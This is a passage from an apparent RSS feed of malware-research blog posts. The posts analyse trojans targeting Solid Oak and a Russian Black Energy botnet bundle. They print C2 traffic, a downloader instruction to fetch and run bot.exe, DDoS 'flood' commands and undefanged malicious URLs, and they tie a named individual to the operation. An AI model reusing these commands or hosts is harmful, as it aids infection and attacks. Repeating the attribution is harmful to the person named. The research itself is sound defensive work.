<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Malware Lab</title>
	<atom:link href="http://malwarelab.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://malwarelab.org</link>
	<description>Investigating politically motivated malware attacks</description>
	<lastBuildDate>Fri, 15 Jan 2010 17:44:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Malware Attacks on Solid Oak After Dispute with Greendam</title>
		<link>http://malwarelab.org/2010/01/malware-attacks-on-solid-oak-after-dispute-with-greendam/</link>
		<comments>http://malwarelab.org/2010/01/malware-attacks-on-solid-oak-after-dispute-with-greendam/#comments</comments>
		<pubDate>Fri, 15 Jan 2010 17:44:23 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Social Engineering]]></category>

		<guid isPermaLink="false">http://malwarelab.org/?p=87</guid>
		<description><![CDATA[By Nart Villeneuve After researchers discovered that portions of China&#8217;s Greendam filtering software were stolen from an American filtering company&#8217;s software, Cybersitter, the company that produces the software, Solid Oak, same under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org) analyzes two samples from the attacks. Findings: The delivery component of [...]]]></description>
			<content:encoded><![CDATA[<p>By Nart Villeneuve</p>
<p>After researchers discovered that portions of China&#8217;s Greendam filtering software were stolen from an American filtering company&#8217;s software, Cybersitter, the company that produces the software, Solid Oak, same under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org)  analyzes two samples from the attacks.</p>
<p>Findings:</p>
<ul>
<li>The delivery component of the attacks specifically targeted Solid Oak. In one case the attackers registered and used a Gmail account that was a misspelling of of a Solid Oak employees name and used it to send an email about a contextually relevant topic.</li>
<li>These targeted emails contained (or linked to) malicious files that, if opened, caused the targets computer to become infected with a Trojan Horse program.</li>
<li>In both cases the Trojan connects to (related) web servers but requests seemingly legitimate files. However, at certain times the attackers insert HTML command tags into these files with commands. </li>
</ul>
<p><strong>Background</strong></p>
<p>In June 2009, it was reported that the Chinese government was requiring the installation of filtering software, known as Green Dam, on all personal computers sold in China.<sup>1</sup> Researchers from the University of Michigan analyzed Green Dam and discovered security vulnerabilities that would allow malicious attackers to take control of any computer running Green Dam. </p>
<p>In addition, they found that portions of Green Dam&#8217;s block lists were taken from a U.S. Company, Solid Oak, that produces a filtering product called CyberSitter, and that the image filtering component was taken from OpenCV, an open source project.<sup>2</sup> Bryan Zhang, the founder of Jin Hui, the company that created Green Dam, denied that Green Dam contained stolen code and stated  that it was “impossible”.<sup>3</sup> Solid Oak released a report detailing the incident and is reportedly  seeking legal action against PC manufacturers that are shipping computers with Green Dam installed.<sup>4</sup></p>
<p>On June 25, 2009 reports emerged stating that Solid Oak was under attack.  In addition to “server problems” company executives began receiving suspicious emails.<sup>5</sup></p>
<p>The following is an analysis of samples of malware sent to Solid Oak.</p>
<p><strong>Sample 1</strong></p>
<p>On June 25, 2009 an email message was sent to Brian Milburn, the CEO of Solid Oak,  from “jenna.dipaquale@gmail.com”;  Jenna DiPasquale (note the missing “s”) is the head of public relations for Solid Oak. </p>
<blockquote><p>
Date: Thu, 25 Jun 2009 05:49:18 -0400<br />
Subject: This is the Jinhui Computer System Engineering Inc&#8217;s report about China&#8217;s Green Dam Youth Escort screening software.<br />
From: Jenna DiPaquale <jenna.dipaquale@gmail.com><br />
To: bmilburn@solidoak.com </p>
<p>This is This is the Jinhui Computer System Engineering Inc&#8217;s report about<br />
China&#8217;s Green Dam Youth Escort screening software.<br />
www.civis.com/jinhui_report.zipabout China&#8217;s Green Dam Youth Escort<br />
screening software.<br />
www.civis.com/jinhui_report.zip
</p></blockquote>
<p>The file, jinhui_report.zip,  was no longer available at www.civis.com at the time of analysis so sample that Solid Oak provided was used. The zip file contains an executable:</p>
<blockquote><p>
Jinhui_Computer_System_Engineering_Inc_the_Chinese_government_officials_report.exe
</p></blockquote>
<p>However, Windows computers have a “feature”  enabled by default that hides file extension cause the malicious executable to appear as if it is a directory/folder.<sup>6</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc1_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc1_.png" alt="" title="solidoak.doc1" width="120" height="135" class="aligncenter size-full wp-image-88" /></a></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc2_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc2_.png" alt="" title="solidoak.doc2" width="120" height="135" class="aligncenter size-full wp-image-89" /></a></p>
<p>When the malicious file is run (the user thinks he or she is opening a directory), a directory with the same name is created and the contents of that directory (a Word document, Jinhuisays.doc) is displayed to the user while malicious software is dropped on the system.  The malicious file issues a connect to http://www.chuckfaganco.com/docs/rmscpt5.htm (76.76.146.89) (See Threat Expert for an automated report.<sup>7</sup>)</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc3_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc3_-300x122.png" alt="" title="solidoak.doc3" width="300" height="122" class="aligncenter size-medium wp-image-92" /></a></p>
<p>The User-Agent contains some interesting characters:</p>
<blockquote><p>
GET /docs/rmscpt5.htm HTTP/1.1<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so<br />
Host: www.chuckfaganco.com
</p></blockquote>
<p>The response contains a “command” in a HTML comment tag:</p>
<blockquote><p>
&lt;!&#8211; {/*jgJ-.J} &#8211;>
</p></blockquote>
<p>This command has since been removed from the requested page. </p>
<p>After opening the malware, a document is displayed, Jinhuisays.doc, but it does not contain malware.<sup>8</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc4_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc4_-300x214.png" alt="" title="solidoak.doc4" width="300" height="214" class="aligncenter size-medium wp-image-101" /></a></p>
<p><strong>Sample 2</strong></p>
<p>The second sample is a Power Point file,  “Solid Oak seteps up China&#8217;net nappy.ppt” that exploits a vulnerability in Power Point to drop a malicious file. (For automated reports see Threat Expert and Virus Total.) <sup>9</sup></p>
<p>The malware drops a file “Net110..exe” which issues a connection to http://www.parkerwood.com/help/403-3.htm. (69.20.4.85)  (For an automated report see Threat Expert.)<sup>10</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc5_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc5_-300x113.png" alt="" title="solidoak.doc5" width="300" height="113" class="aligncenter size-medium wp-image-102" /></a></p>
<p>Unlike Sample 1, the User-Agent does not contain interesting characters:</p>
<blockquote><p>
GET /help/403-3.htm HTTP/1.1<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)<br />
Host: www.parkerwood.com
</p></blockquote>
<p>This command appears as a html comment in the response:</p>
<blockquote><p>
&lt;!&#8211; czox &#8211;>
</p></blockquote>
<p>base64 decode = s:1</p>
<p>It eventually changed to:</p>
<blockquote><p>
&lt;!&#8211; czozMDA= &#8211;>
</p></blockquote>
<p>base64 decode = s:300</p>
<p>Other commands seen on www.parkerwood.com by accessing a variety of other pages throughout the site, such as /help/403-1.htm, /help/403-2.htm, /help/403-4.htm, /help/403-7.htm.</p>
<blockquote><p>
&lt;!&#8211; czo0 &#8211;>
</p></blockquote>
<p>base64 decode = s:4</p>
<blockquote><p>
&lt;!&#8211; czoyNDA= &#8211;>
</p></blockquote>
<p>base64 decode = s:240</p>
<blockquote><p>
&lt;!&#8211; ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm &#8211;>
</p></blockquote>
<p>base64 decode = d:http://www.parkerwood.com/images/top.gif</p>
<blockquote><p>
&lt;!&#8211; {/*jgJ-nJ} &#8211;>
</p></blockquote>
<p>After dropping the Trojan, a Power Point presentation opens.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc6_.png"><img src="http://malwarelab.org/wp-content/uploads/2010/01/solidoak.doc6_-300x215.png" alt="" title="solidoak.doc6" width="300" height="215" class="aligncenter size-medium wp-image-103" /></a></p>
<p>One interesting behaviour of this particular case is that the page(s) that the malware connects to change quite frequently. At times,  command are inserted into the page in HTML comment tags only to be completely removed at a later time, sometimes within several hours of first appearing. These commands also change over time. In addition, sometimes pages are no longer present (404) but re-appear at a later time. At other times, all the pages are restricted (403).</p>
<p>Sample 2 connected to http://www.parkerwood.com/help/403-3.htm every 10 minutes. These connections were monitored starting at Fri Jul 10 14:50:01 2009 and after finally receiving a command Sat Jul 11 22:20:47 2009 the malware did not issue any further connections (the monitoring stopped at Wed Jul 15 08:11:44 2009).</p>
<p>Fri Jul 10 14:50:01 2009 &#8211; 403 Forbidden No Command<br />
Fri Jul 10 23:10:16 2009 &#8211; 404 Not Found No Command<br />
Sat Jul 11 22:10:46 2009 &#8211; 403 Forbidden No Command<br />
Sat Jul 11 22:20:47 2009 200 OK &lt;!&#8211; czozMDA= &#8211;> (base64 decode = s:300)</p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
<p><strong>Notes</strong></p>
<p>[1] <a href="http://www.nytimes.com/2009/06/09/world/asia/09china.html ">http://www.nytimes.com/2009/06/09/world/asia/09china.html </a><br />
[2] <a href="http://www.cse.umich.edu/~jhalderm/pub/gd/ ">http://www.cse.umich.edu/~jhalderm/pub/gd/ </a><br />
[3] <a href="http://online.wsj.com/article/SB124486910756712249.html ">http://online.wsj.com/article/SB124486910756712249.html </a><br />
[4] <a href="http://www.cybersitter.com/gdcs.pdf ">http://www.cybersitter.com/gdcs.pdf </a>and<br />
<a href="http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html ">http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html </a><br />
[5] <a href="http://government.zdnet.com/?p=5034">http://government.zdnet.com/?p=5034</a>, <a href="http://government.zdnet.com/?p=5049">http://government.zdnet.com/?p=5049</a>,<br />
<a href="http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882">http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882</a><br />
[6] <a href="http://www.f-secure.com/weblog/archives/00001675.html ">http://www.f-secure.com/weblog/archives/00001675.html </a><br />
[7] <a href="http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af">http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af</a><br />
[8] <a href="http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-1247083107">http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-<br />
1247083107</a><br />
[9] <a href="http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772">http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772</a> ,<br />
<a href="http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-1247073429 ">http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-<br />
1247073429 </a><br />
[10] <a href="http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c">http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c</a></p>
]]></content:encoded>
			<wfw:commentRss>http://malwarelab.org/2010/01/malware-attacks-on-solid-oak-after-dispute-with-greendam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Russian Malware Bundle</title>
		<link>http://malwarelab.org/2009/11/russian-malware-bundle/</link>
		<comments>http://malwarelab.org/2009/11/russian-malware-bundle/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 15:40:48 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[Black Energy]]></category>
		<category><![CDATA[Botnet]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[DDoS]]></category>
		<category><![CDATA[Iframe Injection]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Rogue AV]]></category>
		<category><![CDATA[Russia]]></category>
		<category><![CDATA[Storm]]></category>

		<guid isPermaLink="false">http://malwarelab.org/?p=58</guid>
		<description><![CDATA[by Nart Villeneuve This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers [...]]]></description>
			<content:encoded><![CDATA[<p>by Nart Villeneuve</p>
<p>This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.</p>
<p>Key findings:</p>
<ul>
<li>From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.</li>
<li>We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.</li>
<li>Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.</li>
<li>This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.</li>
</ul>
<p><strong>Background</strong></p>
<p>In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attack to other areas of cybercrime.</p>
<blockquote><p>Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.<sup>1</sup></p></blockquote>
<p>In fact this appears to be the case for a variety of botnets.  Dancho Danchev states groups that used to specialize in DDoS attacks are &#8220;&#8216;vertically integrating&#8217; in order to occupy as many underground market segments as possible.&#8221;<sup>2</sup></p>
<p>Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:</p>
<blockquote><p>
It&#8217;s also worth pointing out that a huge number of &#8220;boutique vendors&#8221; of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of &#8220;aggregate-and-forget&#8221; type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.<sup>3</sup>
</p></blockquote>
<p>Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraged “protected” sites to DDoS their competitors.</p>
<p>Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate eachother&#8217;s malware or use what FireEye calls a “BotnetWeb” which is defined as:</p>
<blockquote><p>A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).<sup>4</sup></p></blockquote>
<p>Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV&#8217;s.<sup>5</sup> This realignment of criminal actors may partially explain the diversification of malware. </p>
<p>However, there also appears to be a significant role for &#8220;middlemen&#8221; who simply propagate content, whether it be advertisements, iframe injection, rogue AV&#8217;s, or botnet software.</p>
<p><strong>Packet Capture</strong></p>
<p>The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types. </p>
<p>The infected computer connected to four control servers:</p>
<blockquote><p>
sexigood.ru (daro-x@yandex.ru)<br />
81.176.232.103 &#8211; NEOWEB HOSTING, RU</p>
<p>091809.ru (bazhenov@mail.ru)<br />
210.51.166.238 &#8211; China Netcom, CN</p>
<p>zflaersroot.cn (tem.ponakuru@mail.ru)<br />
210.51.166.233  &#8211; China Netcom, CN</p>
<p>moneybizness.ru (belov@pisem.net)<br />
210.51.10.184  &#8211; China Netcom, CN
</p></blockquote>
<p>The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103) and a file “ R23.exe” is downloaded.</p>
<blockquote><p>
GET /1/R23.exe HTTP/1.0<br />
Host: sexigood.ru
</p></blockquote>
<p>An automated analysis of  “ R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the  captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU). </p>
<p><strong>Black Energy</strong></p>
<p>Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.<sup>7</sup> According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.<sup>8</sup></p>
<p>The captured network traffic from the infected computer does show a connection to 091809.ru (210.51.166.238) is a check-in:</p>
<blockquote><p>
POST /1/stat.php HTTP/1.0<br />
Host: 091809.ru<br />
id=x&#8212;&#8212;&#8212;-_382C0098&#038;build_id=.8</p>
<p>HTTP/1.1 200 OK<br />
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=
</p></blockquote>
<p>The response from the C&#038;C is base64 encoded, when decoded it is:</p>
<blockquote><p>
10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x&#8212;&#8212;&#8212;-_382C0098
</p></blockquote>
<p>Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of  2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle1.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle1-300x168.png" alt="bundle1" title="bundle1" width="300" height="168" class="aligncenter size-medium wp-image-60" /></a></p>
<p>Further investigation revealed the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of  4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle2.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle2-300x168.png" alt="bundle2" title="bundle2" width="300" height="168" class="aligncenter size-medium wp-image-61" /></a></p>
<p>During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:</p>
<blockquote><p>
flood http 81.176.239.67
</p></blockquote>
<p>The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is, vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver&#8217;s licenses. The command was changed back to “wait” shortly thereafter.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle3.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle3-180x300.png" alt="bundle3" title="bundle3" width="180" height="300" class="aligncenter size-medium wp-image-62" /></a></p>
<p>Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.</p>
<blockquote><p>
flood http www.vernem-prava.ru index.html
</p></blockquote>
<p>We also observed both command and control servers issues addition DDoS commands:</p>
<blockquote><p>
flood http besticq.ru<br />
flood http www.newkaliningrad.ru forum<br />
flood http wepn.ru<br />
flood http 212.112.224.168
</p></blockquote>
<p>(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.<sup>9</sup>)</p>
<p><strong>Oficla/Sasfis</strong></p>
<p>After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from  moneybizness.ru (210.51.10.184):</p>
<blockquote><p>
GET /tmp/bb.php?id=912030164&#038;v=200&#038;tm=21&#038;b=DDOS1 HTTP/1.1<br />
Host: zflaersroot.cn</p>
<p>HTTP/1.1 200 OK<br />
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]
</p></blockquote>
<p>An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).<sup>10</sup> Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”</p>
<blockquote><p>
GET /tmp/bb.php?id=912030164&#038;v=200&#038;tm=21&#038;b=DDOS1&#038;tid=43&#038;r=1 HTTP/1.1<br />
Host: zflaersroot.cn</p>
<p>HTTP/1.1 200 OK<br />
[info]kill:0|delay:30|upd:0|backurls:[/info]
</p></blockquote>
<p>This behaviour is identical to Win32/Oficla, a  trojan downloader.<sup>11</sup> In this case the Oficla download instructs the infected computer to download “bot.exe” which connect to the Black Energy control server.</p>
<p><strong>Rogue AV&#8217;s</strong></p>
<p>The malware  file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103),  connected to to 091809.ru (210.51.166.238), the Black Energy control server,  zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.<sup>12</sup></p>
<blockquote><p>
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&#038;a=2724<br />
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&#038;a=2724<br />
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&#038;id=2724
</p></blockquote>
<p>In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103) including “8.exe,”<sup>13</sup> “R31.exe”<sup>14</sup> and “Windows_Protector.exe.”<sup>15</sup> An analysis of “ Windows_Protector.exe” showed that it downloaded another files named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).<sup>16</sup></p>
<p>This URL was found in hxxp://scanyourpc-fastx.com/pdm/x.exe “ Windows_Protector.exe.” The “x.exe”<sup>17</sup> from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) file connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.<br />
The files that were on sexigood.ru (81.176.232.103) were replaced with “Bee.dll,”<sup>18</sup>  “ked.exe,”<sup>19</sup>  “win2ext.exe,”<sup>20</sup>  and “Windows_Protector.exe.”<sup>21</sup>  The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).</p>
<p><strong>&#8220;rundll32&#8243;</strong></p>
<p>There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections are redirected “www.fbi.gov.” Software that connects to the IP address, “66.197.149.41,” is under review by PrevX.<sup>22</sup></p>
<blockquote><p>
GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0<br />
Referer: http://www.pay-per-install.info/<br />
Host: www.pay-per-install.info</p>
<p>HTTP/1.1 301 Moved Permanently<br />
Server: nginx<br />
Location: http://www.fbi.gov/
</p></blockquote>
<p>The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”</p>
<blockquote><p>
$ host www.pay-per-install.info<br />
www.pay-per-install.info is an alias for ddos.fuckingtest.net.<br />
ddos.fuckingtest.net has address 127.0.0.1
</p></blockquote>
<p>Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle4.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle4-300x231.png" alt="bundle4" title="bundle4" width="300" height="231" class="aligncenter size-medium wp-image-63" /></a></p>
<p> There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertizes the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.<sup>23</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle5.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle5-300x229.png" alt="bundle5" title="bundle5" width="300" height="229" class="aligncenter size-medium wp-image-64" /></a></p>
<p>While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:     </p>
<blockquote><p>
$ host www.rundll32.ru<br />
www.rundll32.ru is an alias for ddos.fuckingtest.net.<br />
ddos.fuckingtest.net has address 127.0.0.1
</p></blockquote>
<p>Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle6.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle6-300x58.png" alt="bundle6" title="bundle6" width="300" height="58" class="aligncenter size-medium wp-image-65" /></a></p>
<p>The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains al of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com rentaplayer.com snowdomain.com solutionmgmt.com syattenterprises.com trailingfirecards.com noc8.com and strategymanagementinc.com.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle7.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle7-300x90.png" alt="bundle7" title="bundle7" width="300" height="90" class="aligncenter size-medium wp-image-66" /></a></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle8.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle8-300x282.png" alt="bundle8" title="bundle8" width="300" height="282" class="aligncenter size-medium wp-image-67" /></a></p>
<p>In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&#038;sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&#038;engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.<sup>24</sup> </p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle9.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle9-300x206.png" alt="bundle9" title="bundle9" width="300" height="206" class="aligncenter size-medium wp-image-68" /></a></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle10.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle10-300x236.png" alt="bundle10" title="bundle10" width="300" height="236" class="aligncenter size-medium wp-image-69" /></a></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/11/bundle11.png"><img src="http://malwarelab.org/wp-content/uploads/2009/11/bundle11-300x206.png" alt="bundle11" title="bundle11" width="300" height="206" class="aligncenter size-medium wp-image-70" /></a></p>
<p>We also found that some pages redirected users to “counterweb.cn” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN) as the Black Energy command and control servers 091809.ru and  sexiland.ru. The connections to counterweb.cn:</p>
<blockquote><p>
GET /t/out.php HTTP/1.1<br />
Host: counterweb.cn<br />
Referer: http://strategymanagementinc.com/uczqy/</p>
<p>HTTP/1.x 302 Found<br />
Location: http://counterweb.cn/sutra/in.cgi?default</p>
<p>GET /sutra/in.cgi?default HTTP/1.1<br />
Host: counterweb.cn<br />
Referer: http://strategymanagementinc.com/uczqy/</p>
<p>HTTP/1.x 302 Found<br />
Location: http://counterweb.cn/sutra/in.cgi?2</p>
<p>GET /sutra/in.cgi?2 HTTP/1.1<br />
Host: counterweb.cn<br />
Referer: http://strategymanagementinc.com/uczqy/</p>
<p>HTTP/1.x 302 Found<br />
Location: http://google.com
</p></blockquote>
<p>We also found a variety of malicious javascript and iframes that loaded the following URLs:</p>
<blockquote><p>
hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)<br />
hxxp://javascrlpt.com/s/in.cgi?8<br />
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)<br />
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)
</p></blockquote>
<p>The domain, 000007.ru has been hosting “Windows_Protector.exe” which is the rogue AV we also found on sexigood.ru (81.176.232.103).<sup>25</sup> The domain, javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.<sup>26</sup> All these domain names appear to have been used in iframe injection attacks.</p>
<p>Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com. </p>
<p><strong>Storm</strong></p>
